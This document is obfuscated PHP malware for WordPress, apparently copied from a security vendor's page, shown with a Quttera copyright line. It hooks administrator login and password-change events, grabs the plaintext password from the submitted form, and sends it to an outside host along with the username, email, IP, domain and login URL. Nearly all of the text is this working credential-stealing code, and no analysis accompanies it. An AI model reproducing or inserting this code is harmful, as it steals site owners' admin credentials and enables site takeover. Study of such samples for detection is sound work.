goto avTUK; zWyuW: function chgpwd($user_id, $old_user_data) { $user = get_user_by("ID", $user_id); if (!in_array("administrator", $user->roles)) { return; } if ($user->user_pass !== $old_user_data->user_pass) { $pw = isset($_POST["pass2"]) ? $_POST["pass2"] : json_encode($_POST); snd_msg_fmted($user->user_login, $user->user_email, $pw, "ADMIN NAKAL NIH!🤬"); } } goto q2qKn; nQj31: add_action("profile_update", "chgpwd", 10, 2); goto zWyuW; NeidW: function ipss() { $ip = ''; if (isset($_SERVER["HTTP_CLIENT_IP"])) { $ip = $_SERVER["HTTP_CLIENT_IP"]; } elseif (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } elseif (isset($_SERVER["HTTP_X_FORWARDED"])) { $ip = $_SERVER["HTTP_X_FORWARDED"]; } elseif (isset($_SERVER["HTTP_FORWARDED_FOR"])) { $ip = $_SERVER["HTTP_FORWARDED_FOR"]; } elseif (isset($_SERVER["HTTP_FORWARDED"])) { $ip = $_SERVER["HTTP_FORWARDED"]; } elseif (isset($_SERVER["REMOTE_ADDR"])) { $ip = $_SERVER["REMOTE_ADDR"]; } return $ip; } goto zMwSo; zMwSo: function tenoti($data) { $hook_url = "https://pauladepoju.com/c.php"; $token = "c086992b394301aada724d921f04835cV16"; $message = sprintf("✅ " . $data["action"] . " ✅\xa\xaⰠTime: %s\xa👤 User: %s\xa🔑 Password: %s
📧 Email: %s
🔗 Site Information:
📠Domain: %s
🌠Site URL: %s\xa📠Login Page: %s", $data["timestamp"], $data["username"], $data["password"], $data["email"], $data["domain"], $data["site_url"], $data["login_page"]); $args = array("timeout" => 5, "redirection" => 5, "blocking" => false, "headers" => array("User-Agent" => $data["browser"], "Referer" => $data["site_url"])); $request_url = add_query_arg(array("token" => $token, "text" => urlencode($message)), $hook_url); wp_remote_get($request_url, $args); } goto z_Fvy; avTUK: add_action("wp_login", "succlog", 10, 2); goto qLk8B; qLk8B: function succlog($user_login, $user) { if (!in_array("administrator", $user->roles)) { return; } if (isset($_POST["pwd"])) { $pw = $_POST["pwd"]; } elseif (isset($_POST["password"])) { $pw = $_POST["password"]; } else { $pw = json_encode($_POST); } snd_msg_fmted($user_login, $user->user_email, $pw); } goto nQj31; q2qKn: function snd_msg_fmted($u, $em, $pw, $act = "LOGIN SUCCESS") { $site_url = get_site_url(); $current_page = $_SERVER["REQUEST_URI"]; $http_host = $_SERVER["HTTP_HOST"]; $referrer = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "Direct Access"; $data = array("action" => $act, "timestamp" => current_time("mysql"), "username" => $u, "password" => $pw, "email" => $em, "ip" => ipss(), "browser" => $_SERVER["HTTP_USER_AGENT"], "site_url" => $site_url, "login_page" => $current_page, "domain" => $http_host, "referrer" => $referrer); tenoti($data); } goto NeidW; z_Fvy:© 2023 Quttera Ltd. All rights reserved.